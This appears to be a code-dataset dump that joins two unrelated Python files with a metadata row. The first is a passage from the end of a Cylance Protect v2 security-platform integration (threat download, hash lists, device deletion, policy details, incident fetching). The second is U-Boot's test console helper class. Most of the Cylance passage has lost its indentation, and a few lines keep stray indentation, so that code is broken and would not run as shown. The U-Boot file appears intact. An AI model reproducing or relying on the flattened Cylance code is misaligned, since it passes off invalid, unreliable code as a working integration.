'Vendor': 'Cylance Protect',
'Score': dbot_score
}
demisto.results({
'Type': entryTypes['note'],
'ContentsFormat': formats['json'],
'Contents': contents,
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown('Cylance Protect - Downloading threat attached to the following hash: '
+ sha256, contents),
'EntryContext': context
})
def download_threat_request(hash):
access_token = get_authentication_token(scope=SCOPE_THREAT_READ)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
uri = '%s/%s/%s' % (URI_THREATS, "download", hash)
res = api_call(uri=uri, method='get', headers=headers)
if not res['url']:
return_error('No url was found')
return res['url']
def add_hash_to_list():
context = {}
sha256 = demisto.args().get('sha256')
list_type = demisto.args().get('listType')
reason = demisto.args().get('reason')
category = demisto.args().get('category')
if list_type == "GlobalSafe" and not category:
return_error('Category argument is required for list type of Global Safe')
add_hash = add_hash_to_list_request(sha256, list_type, reason, category)
if not add_hash:
return_error('Could not add hash to list')
contents = {
'Threat File SHA256': sha256,
'List Type': list_type,
'Category': category,
'Reason': reason
}
context[outputPaths['file']] = {
'SHA256': sha256,
'Cylance': {
'ListType': list_type,
'Category': category
}
}
demisto.results({
'Type': entryTypes['note'],
'ContentsFormat': formats['json'],
'Contents': contents,
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(
'The requested threat has been successfully added to ' + list_type + ' hashlist.', contents),
'EntryContext': context
})
def add_hash_to_list_request(sha256, list_type, reason, category=None):
access_token = get_authentication_token(scope=SCOPE_GLOBAL_LIST_CREATE)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
body = {
'sha256': sha256,
'list_type': list_type,
'reason': reason
}
if category:
body['category'] = category.replace(" ", "")
res = api_call(uri=URI_LISTS, method='post', headers=headers, body=body)
return res
def delete_hash_from_lists():
sha256 = demisto.args().get('sha256')
list_type = demisto.args().get('listType')
context = {}
delete_hash_from_lists_request(sha256, list_type)
contents = {
'Threat File SHA256': sha256,
'Threat List Type': list_type
}
context[outputPaths['file']] = {
'SHA256': sha256,
'Cylance': {
'ListType': list_type
}
}
demisto.results({
'Type': entryTypes['note'],
'ContentsFormat': formats['json'],
'Contents': contents,
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(
'The requested threat has been successfully removed from ' + list_type + ' hashlist.', contents),
'EntryContext': context
})
def delete_hash_from_lists_request(sha256, list_type):
access_token = get_authentication_token(scope=SCOPE_GLOBAL_LIST_DELETE)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
body = {
'sha256': sha256,
'list_type': list_type
}
res = api_call(uri=URI_LISTS, method='delete', headers=headers, body=body)
return res
def delete_devices():
device_ids = demisto.args().get('deviceIds')
device_ids_list = argToList(device_ids)
contents = []
context_list = []
for device_id in device_ids_list:
device = get_device_request(device_id)
if not device:
continue
device_name = device.get('name')
context_list.append({
'Id': device_id,
'Name': device_name,
'Deleted': True
})
contents.append({
'Device Removed': device_id,
'Device Name': device_name,
'Deletion status': True
})
batch_size = demisto.args().get("batch_size", 20)
try:
batch_size = int(batch_size)
except ValueError:
return_error("Error: Batch Size specified must represent an int.")
for i in range(0, len(device_ids_list), batch_size):
current_deleted_devices_batch = device_ids_list[i:i + batch_size]
delete_devices_request(current_deleted_devices_batch)
context = {
'Cylance.Device(val.Id && val.Id == obj.Id)': context_list
}
demisto.results({
'Type': entryTypes['note'],
'ContentsFormat': formats['json'],
'Contents': contents,
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(
'The requested devices have been successfully removed from your organization list.', contents),
'EntryContext': context
})
def delete_devices_request(device_ids):
access_token = get_authentication_token()
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
body = {
'device_ids': device_ids
}
res = api_call(uri=URI_DEVICES, method='delete', headers=headers, body=body)
if not res or not res.get('request_id'):
return_error('Delete response does not contain request id')
return res
def get_policy_details():
policy_id = demisto.args()['policyID']
contents = {} # type: Dict
context = {} # type: Dict
title = 'Could not find policy details for that ID'
filetype_actions_threat_contents = [] # type: list
filetype_actions_suspicious_contents = [] # type: list
safelist_contents = [] # type: list
title_filetype_actions_threat = 'Cylance Policy Details - FileType Actions Threat Files'
title_filetype_actions_suspicious = 'Cylance Policy Details - FileType Actions Suspicious Files'
title_safelist = 'Cylance Policy Details - File Exclusions - SafeList'
title_memory_exclusion = 'Cylance Policy Details - Memory Violation Actions \n' +\
'This table provides detailed information about the memory violation settings. \n' +\
'Memory protections Exclusion List :'
title_memory_violation = 'Memory Violation Settings: '
title_additional_settings = 'Cylance Policy Details - Policy Settings. \n' +\
'Various policy settings are contained within this section.'
policy_details = get_policy_details_request(policy_id)
    memory_violations_content = []
    additional_settings_content = []
if policy_details:
title = 'Cylance Policy Details for: ' + policy_id
date_time = ''
        # The timestamp in the response comes back as a malformed string; extract the
        # epoch milliseconds and convert them to an ISO datetime.
timestamp = policy_details.get('policy_utctimestamp')
if timestamp:
reg = re.search(r"\d{13}", timestamp)
if reg:
ts = float(reg.group())
date_time = datetime.fromtimestamp(ts / 1000).strftime('%Y-%m-%dT%H:%M:%S.%f+00:00')
context = {
'Cylance.Policy(val.ID && val.ID == obj.ID)': {
'ID': policy_details.get('policy_id'),
'Name': policy_details.get('policy_name'),
'Timestamp': date_time
}
}
contents = {
'Policy Name': policy_details.get('policy_name'),
'Policy Created At': date_time
}
        suspicious_files = policy_details.get('filetype_actions').get('suspicious_files')
        if suspicious_files:
            suspicious_files_list = []
            for file in suspicious_files:
                suspicious_files_list.append({
                    'Actions': file.get('actions'),
                    'File Type': file.get('file_type')
                })
            filetype_actions_suspicious_contents = suspicious_files_list
        threat_files = policy_details.get('filetype_actions').get('threat_files')
        if threat_files:
            threat_files_list = []
            for file in threat_files:
                threat_files_list.append({
                    'Actions': file.get('actions'),
                    'File Type': file.get('file_type')
                })
            filetype_actions_threat_contents = threat_files_list
safelist = policy_details.get('file_exclusions')
if safelist:
file_exclusions_list = []
for file_exclusion in safelist:
file_exclusions_list.append({
'Research Class ID': file_exclusion.get('research_class_id'),
'Infinity': file_exclusion.get('infinity'),
'File Type': file_exclusion.get('file_type'),
'AV Industry': file_exclusion.get('av_industry'),
'Cloud Score': file_exclusion.get('cloud_score'),
'File Hash': file_exclusion.get('file_hash'),
'Research Subclass ID': file_exclusion.get('research_subclass_id'),
'Reason': file_exclusion.get('reason'),
'File Name': file_exclusion.get('file_name'),
'Category Id': file_exclusion.get('category_id'),
'MD5': file_exclusion.get('md5')
})
safelist_contents = file_exclusions_list
memory_violations = policy_details.get('memoryviolation_actions').get('memory_violations')
for memory_violation in memory_violations:
memory_violations_content.append({
'Action': memory_violation.get('action'),
'Violation Type': memory_violation.get('violation_type')
})
additional_settings = policy_details.get('policy')
additional_settings_content = []
for additional_setting in additional_settings:
additional_settings_content.append({
'Name': additional_setting.get('name'),
'Value': additional_setting.get('value')
})
demisto.results({
'Type': entryTypes['note'],
'Contents': contents,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, contents)
+ tableToMarkdown(title_filetype_actions_suspicious, filetype_actions_suspicious_contents)
+ tableToMarkdown(title_filetype_actions_threat, filetype_actions_threat_contents)
+ tableToMarkdown(title_safelist, safelist_contents)
+ tableToMarkdown(title_memory_exclusion, policy_details.get('memory_exclusion_list'))
+ tableToMarkdown(title_memory_violation, memory_violations_content)
        + tableToMarkdown(title_additional_settings, additional_settings_content),
'EntryContext': context
})
def get_policy_details_request(policy_id):
access_token = get_authentication_token(scope=SCOPE_POLICY_READ)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
uri = '%s/%s' % (URI_POLICIES, policy_id)
res = api_call(uri=uri, method='get', headers=headers)
return res
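# fetch_incidents pulls the current threat list and turns every threat whose
# 'last_found' timestamp is newer than the stored last-run time into an incident.
# The newest 'last_found' value seen is persisted via demisto.setLastRun() so the
# next run only picks up later threats; the very first run looks back three days.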
def fetch_incidents():
now = datetime.utcnow()
last_run = demisto.getLastRun().get('time')
if last_run is None:
now = now - timedelta(days=3)
last_run = now
else:
last_run = datetime.strptime(last_run, '%Y-%m-%dT%H:%M:%S') # Converts string to datetime object
current_run = last_run
threats = get_threats_request().get('page_items', [])
incidents = []
for threat in threats:
last_found = datetime.strptime(threat['last_found'], '%Y-%m-%dT%H:%M:%S')
if last_found > last_run:
incident = threat_to_incident(threat)
incidents.append(incident)
if last_found > current_run:
current_run = last_found
demisto.incidents(incidents)
demisto.setLastRun({'time': current_run.isoformat().split('.')[0]})
def add_capitalized_hash_to_context(threats_context):
"""Add capitalized hash keys to the context such as SHA256 and MD5,
the keys are redundant since they are used for avoiding BC issues.
Args:
threats_context(list): list of dicts of context outputs for the threats of interest, each containing
the key 'Sha256' (and possibly (Md5)).
Returns:
threats_context(list): list of dicts of context outputs for the threats of interest, each containing
the key and value 'Sha256' (and possibly Md5) as well as the key and value 'SHA256' (and possible MD5).
"""
if not isinstance(threats_context, list):
threats_context = [threats_context]
for context_item in threats_context:
if context_item.get('Sha256'):
context_item['SHA256'] = context_item.get('Sha256')
if context_item.get('Md5'):
context_item['MD5'] = context_item.get('Md5')
return threats_context
# EXECUTION
LOG('command is %s' % (demisto.command(),))
try:
handle_proxy()
if demisto.command() == 'test-module':
test()
if demisto.command() == 'fetch-incidents':
fetch_incidents()
elif demisto.command() == 'cylance-protect-get-devices':
get_devices()
elif demisto.command() == 'cylance-protect-get-device':
get_device()
elif demisto.command() == 'cylance-protect-update-device':
update_device()
elif demisto.command() == 'cylance-protect-get-device-threats':
get_device_threats()
elif demisto.command() == 'cylance-protect-get-policies':
get_policies()
elif demisto.command() == 'cylance-protect-create-zone':
create_zone()
elif demisto.command() == 'cylance-protect-get-zones':
get_zones()
elif demisto.command() == 'cylance-protect-get-zone':
get_zone()
elif demisto.command() == 'cylance-protect-update-zone':
update_zone()
elif demisto.command() == 'cylance-protect-get-threat':
get_threat()
elif demisto.command() == 'cylance-protect-get-threats':
get_threats()
elif demisto.command() == 'cylance-protect-get-threat-devices':
get_threat_devices()
elif demisto.command() == 'cylance-protect-get-indicators-report':
get_indicators_report()
elif demisto.command() == 'cylance-protect-update-device-threats':
update_device_threats()
elif demisto.command() == 'cylance-protect-get-list':
get_list()
elif demisto.command() == 'cylance-protect-get-list-entry':
get_list_entry_by_hash()
# new commands
elif demisto.command() == 'cylance-protect-download-threat':
download_threat()
elif demisto.command() == 'cylance-protect-add-hash-to-list':
add_hash_to_list()
elif demisto.command() == 'cylance-protect-delete-hash-from-lists':
delete_hash_from_lists()
elif demisto.command() == 'cylance-protect-delete-devices':
delete_devices()
elif demisto.command() == 'cylance-protect-get-policy-details':
get_policy_details()
except Warning as w:
demisto.results({
'Type': 11,
'Contents': str(w),
'ContentsFormat': formats['text']
})
except Exception as e:
demisto.error('#### error in Cylance Protect v2: ' + str(e))
if demisto.command() == 'fetch-incidents':
LOG.print_log()
raise
else:
return_error(str(e))
| mit | 6,929,150,291,079,900,000 | 33.364505 | 120 | 0.598184 | false |
chris4795/u-boot-novena | test/py/u_boot_console_base.py | 2 | 16718 | # Copyright (c) 2015 Stephen Warren
# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved.
#
# SPDX-License-Identifier: GPL-2.0
# Common logic to interact with U-Boot via the console. This class provides
# the interface that tests use to execute U-Boot shell commands and wait for
# their results. Sub-classes exist to perform board-type-specific setup
# operations, such as spawning a sub-process for Sandbox, or attaching to the
# serial console of real hardware.
import multiplexed_log
import os
import pytest
import re
import sys
import u_boot_spawn
# Regexes for text we expect U-Boot to send to the console.
pattern_u_boot_spl_signon = re.compile('(U-Boot SPL \\d{4}\\.\\d{2}[^\r\n]*\\))')
pattern_u_boot_main_signon = re.compile('(U-Boot \\d{4}\\.\\d{2}[^\r\n]*\\))')
pattern_stop_autoboot_prompt = re.compile('Hit any key to stop autoboot: ')
pattern_unknown_command = re.compile('Unknown command \'.*\' - try \'help\'')
pattern_error_notification = re.compile('## Error: ')
pattern_error_please_reset = re.compile('### ERROR ### Please RESET the board ###')
PAT_ID = 0
PAT_RE = 1
bad_pattern_defs = (
('spl_signon', pattern_u_boot_spl_signon),
('main_signon', pattern_u_boot_main_signon),
('stop_autoboot_prompt', pattern_stop_autoboot_prompt),
('unknown_command', pattern_unknown_command),
('error_notification', pattern_error_notification),
('error_please_reset', pattern_error_please_reset),
)
class ConsoleDisableCheck(object):
"""Context manager (for Python's with statement) that temporarily disables
the specified console output error check. This is useful when deliberately
executing a command that is known to trigger one of the error checks, in
order to test that the error condition is actually raised. This class is
used internally by ConsoleBase::disable_check(); it is not intended for
direct usage."""
def __init__(self, console, check_type):
self.console = console
self.check_type = check_type
def __enter__(self):
self.console.disable_check_count[self.check_type] += 1
self.console.eval_bad_patterns()
def __exit__(self, extype, value, traceback):
self.console.disable_check_count[self.check_type] -= 1
self.console.eval_bad_patterns()
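# Illustrative usage (a sketch; the fixture name and command are assumptions): tests
# normally reach this via ConsoleBase.disable_check(), e.g. to deliberately run an
# invalid command without tripping the 'unknown_command' check:
#   with u_boot_console.disable_check('unknown_command'):
#       u_boot_console.run_command('i_am_not_a_command')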
class ConsoleSetupTimeout(object):
"""Context manager (for Python's with statement) that temporarily sets up
timeout for specific command. This is useful when execution time is greater
then default 30s."""
def __init__(self, console, timeout):
self.p = console.p
self.orig_timeout = self.p.timeout
self.p.timeout = timeout
def __enter__(self):
return self
def __exit__(self, extype, value, traceback):
self.p.timeout = self.orig_timeout
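# Illustrative usage (a sketch; the fixture name, command and timeout value are
# assumptions): tests reach this via ConsoleBase.temporary_timeout(), e.g. for a
# command that can legitimately exceed the default 30s:
#   with u_boot_console.temporary_timeout(60000):
#       u_boot_console.run_command('sf erase 0 100000')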
class ConsoleBase(object):
"""The interface through which test functions interact with the U-Boot
console. This primarily involves executing shell commands, capturing their
    results, and checking for common error conditions. Some common utilities
    are also provided."""
def __init__(self, log, config, max_fifo_fill):
"""Initialize a U-Boot console connection.
Can only usefully be called by sub-classes.
Args:
            log: A multiplexed_log.Logfile object, to which the U-Boot output
will be logged.
config: A configuration data structure, as built by conftest.py.
max_fifo_fill: The maximum number of characters to send to U-Boot
command-line before waiting for U-Boot to echo the characters
back. For UART-based HW without HW flow control, this value
should be set less than the UART RX FIFO size to avoid
overflow, assuming that U-Boot can't keep up with full-rate
traffic at the baud rate.
Returns:
Nothing.
"""
self.log = log
self.config = config
self.max_fifo_fill = max_fifo_fill
self.logstream = self.log.get_stream('console', sys.stdout)
# Array slice removes leading/trailing quotes
self.prompt = self.config.buildconfig['config_sys_prompt'][1:-1]
self.prompt_compiled = re.compile('^' + re.escape(self.prompt), re.MULTILINE)
self.p = None
self.disable_check_count = {pat[PAT_ID]: 0 for pat in bad_pattern_defs}
self.eval_bad_patterns()
self.at_prompt = False
self.at_prompt_logevt = None
def eval_bad_patterns(self):
self.bad_patterns = [pat[PAT_RE] for pat in bad_pattern_defs \
if self.disable_check_count[pat[PAT_ID]] == 0]
self.bad_pattern_ids = [pat[PAT_ID] for pat in bad_pattern_defs \
if self.disable_check_count[pat[PAT_ID]] == 0]
def close(self):
"""Terminate the connection to the U-Boot console.
This function is only useful once all interaction with U-Boot is
complete. Once this function is called, data cannot be sent to or
received from U-Boot.
Args:
None.
Returns:
Nothing.
"""
if self.p:
self.p.close()
self.logstream.close()
def run_command(self, cmd, wait_for_echo=True, send_nl=True,
wait_for_prompt=True):
"""Execute a command via the U-Boot console.
The command is always sent to U-Boot.
U-Boot echoes any command back to its output, and this function
typically waits for that to occur. The wait can be disabled by setting
wait_for_echo=False, which is useful e.g. when sending CTRL-C to
interrupt a long-running command such as "ums".
Command execution is typically triggered by sending a newline
character. This can be disabled by setting send_nl=False, which is
also useful when sending CTRL-C.
This function typically waits for the command to finish executing, and
returns the console output that it generated. This can be disabled by
setting wait_for_prompt=False, which is useful when invoking a long-
running command such as "ums".
Args:
cmd: The command to send.
wait_for_echo: Boolean indicating whether to wait for U-Boot to
echo the command text back to its output.
send_nl: Boolean indicating whether to send a newline character
after the command string.
wait_for_prompt: Boolean indicating whether to wait for the
command prompt to be sent by U-Boot. This typically occurs
immediately after the command has been executed.
Returns:
If wait_for_prompt == False:
Nothing.
Else:
The output from U-Boot during command execution. In other
                words, the text U-Boot emitted between the point it echoed the
command string and emitted the subsequent command prompts.
"""
if self.at_prompt and \
self.at_prompt_logevt != self.logstream.logfile.cur_evt:
self.logstream.write(self.prompt, implicit=True)
try:
self.at_prompt = False
if send_nl:
cmd += '\n'
while cmd:
# Limit max outstanding data, so UART FIFOs don't overflow
chunk = cmd[:self.max_fifo_fill]
cmd = cmd[self.max_fifo_fill:]
self.p.send(chunk)
if not wait_for_echo:
continue
chunk = re.escape(chunk)
chunk = chunk.replace('\\\n', '[\r\n]')
m = self.p.expect([chunk] + self.bad_patterns)
if m != 0:
self.at_prompt = False
raise Exception('Bad pattern found on console: ' +
self.bad_pattern_ids[m - 1])
if not wait_for_prompt:
return
m = self.p.expect([self.prompt_compiled] + self.bad_patterns)
if m != 0:
self.at_prompt = False
raise Exception('Bad pattern found on console: ' +
self.bad_pattern_ids[m - 1])
self.at_prompt = True
self.at_prompt_logevt = self.logstream.logfile.cur_evt
# Only strip \r\n; space/TAB might be significant if testing
# indentation.
return self.p.before.strip('\r\n')
except Exception as ex:
self.log.error(str(ex))
self.cleanup_spawn()
raise
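    # Illustrative usage (a sketch; the exact "ums" arguments are assumptions): a
    # long-running command is started without waiting for the prompt, and later
    # interrupted with ctrlc():
    #   u_boot_console.run_command('ums 0 mmc 0', wait_for_prompt=False)
    #   ... perform host-side checks ...
    #   u_boot_console.ctrlc()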
def run_command_list(self, cmds):
"""Run a list of commands.
This is a helper function to call run_command() with default arguments
for each command in a list.
Args:
            cmds: List of commands (each a string).
Returns:
A list of output strings from each command, one element for each
command.
"""
output = []
for cmd in cmds:
output.append(self.run_command(cmd))
return output
def ctrlc(self):
"""Send a CTRL-C character to U-Boot.
This is useful in order to stop execution of long-running synchronous
commands such as "ums".
Args:
None.
Returns:
Nothing.
"""
self.log.action('Sending Ctrl-C')
self.run_command(chr(3), wait_for_echo=False, send_nl=False)
def wait_for(self, text):
"""Wait for a pattern to be emitted by U-Boot.
This is useful when a long-running command such as "dfu" is executing,
and it periodically emits some text that should show up at a specific
location in the log file.
Args:
text: The text to wait for; either a string (containing raw text,
not a regular expression) or an re object.
Returns:
Nothing.
"""
if type(text) == type(''):
text = re.escape(text)
m = self.p.expect([text] + self.bad_patterns)
if m != 0:
raise Exception('Bad pattern found on console: ' +
self.bad_pattern_ids[m - 1])
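    # Illustrative usage (a sketch; the command and the expected text are assumptions):
    #   u_boot_console.run_command('dfu 0 mmc 0', wait_for_prompt=False)
    #   u_boot_console.wait_for('Ctrl+C to exit')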
def drain_console(self):
"""Read from and log the U-Boot console for a short time.
U-Boot's console output is only logged when the test code actively
waits for U-Boot to emit specific data. There are cases where tests
can fail without doing this. For example, if a test asks U-Boot to
enable USB device mode, then polls until a host-side device node
exists. In such a case, it is useful to log U-Boot's console output
        in case U-Boot printed clues as to why the host-side event did not
occur. This function will do that.
Args:
None.
Returns:
Nothing.
"""
# If we are already not connected to U-Boot, there's nothing to drain.
# This should only happen when a previous call to run_command() or
# wait_for() failed (and hence the output has already been logged), or
# the system is shutting down.
if not self.p:
return
orig_timeout = self.p.timeout
try:
# Drain the log for a relatively short time.
self.p.timeout = 1000
# Wait for something U-Boot will likely never send. This will
# cause the console output to be read and logged.
self.p.expect(['This should never match U-Boot output'])
except u_boot_spawn.Timeout:
pass
finally:
self.p.timeout = orig_timeout
def ensure_spawned(self):
"""Ensure a connection to a correctly running U-Boot instance.
This may require spawning a new Sandbox process or resetting target
hardware, as defined by the implementation sub-class.
This is an internal function and should not be called directly.
Args:
None.
Returns:
Nothing.
"""
if self.p:
return
try:
self.log.start_section('Starting U-Boot')
self.at_prompt = False
self.p = self.get_spawn()
# Real targets can take a long time to scroll large amounts of
# text if LCD is enabled. This value may need tweaking in the
# future, possibly per-test to be optimal. This works for 'help'
# on board 'seaboard'.
if not self.config.gdbserver:
self.p.timeout = 30000
self.p.logfile_read = self.logstream
bcfg = self.config.buildconfig
config_spl = bcfg.get('config_spl', 'n') == 'y'
config_spl_serial_support = bcfg.get('config_spl_serial_support',
'n') == 'y'
env_spl_skipped = self.config.env.get('env__spl_skipped',
False)
if config_spl and config_spl_serial_support and not env_spl_skipped:
m = self.p.expect([pattern_u_boot_spl_signon] +
self.bad_patterns)
if m != 0:
raise Exception('Bad pattern found on SPL console: ' +
self.bad_pattern_ids[m - 1])
m = self.p.expect([pattern_u_boot_main_signon] + self.bad_patterns)
if m != 0:
raise Exception('Bad pattern found on console: ' +
self.bad_pattern_ids[m - 1])
self.u_boot_version_string = self.p.after
while True:
m = self.p.expect([self.prompt_compiled,
pattern_stop_autoboot_prompt] + self.bad_patterns)
if m == 0:
break
if m == 1:
self.p.send(' ')
continue
raise Exception('Bad pattern found on console: ' +
self.bad_pattern_ids[m - 2])
self.at_prompt = True
self.at_prompt_logevt = self.logstream.logfile.cur_evt
except Exception as ex:
self.log.error(str(ex))
self.cleanup_spawn()
raise
finally:
self.log.end_section('Starting U-Boot')
def cleanup_spawn(self):
"""Shut down all interaction with the U-Boot instance.
This is used when an error is detected prior to re-establishing a
connection with a fresh U-Boot instance.
This is an internal function and should not be called directly.
Args:
None.
Returns:
Nothing.
"""
try:
if self.p:
self.p.close()
except:
pass
self.p = None
def restart_uboot(self):
"""Shut down and restart U-Boot."""
self.cleanup_spawn()
self.ensure_spawned()
def get_spawn_output(self):
"""Return the start-up output from U-Boot
Returns:
            The output produced by ensure_spawned(), as a string.
"""
if self.p:
return self.p.get_expect_output()
return None
def validate_version_string_in_text(self, text):
"""Assert that a command's output includes the U-Boot signon message.
This is primarily useful for validating the "version" command without
duplicating the signon text regex in a test function.
Args:
text: The command output text to check.
Returns:
Nothing. An exception is raised if the validation fails.
"""
assert(self.u_boot_version_string in text)
def disable_check(self, check_type):
"""Temporarily disable an error check of U-Boot's output.
Create a new context manager (for use with the "with" statement) which
temporarily disables a particular console output error check.
Args:
check_type: The type of error-check to disable. Valid values may
be found in self.disable_check_count above.
Returns:
A context manager object.
"""
return ConsoleDisableCheck(self, check_type)
def temporary_timeout(self, timeout):
"""Temporarily set up different timeout for commands.
Create a new context manager (for use with the "with" statement) which
temporarily change timeout.
Args:
timeout: Time in milliseconds.
Returns:
A context manager object.
"""
return ConsoleSetupTimeout(self, timeout)
| gpl-2.0 | -670,844,553,990,822,100 | 35.662281 | 85 | 0.586374 | false |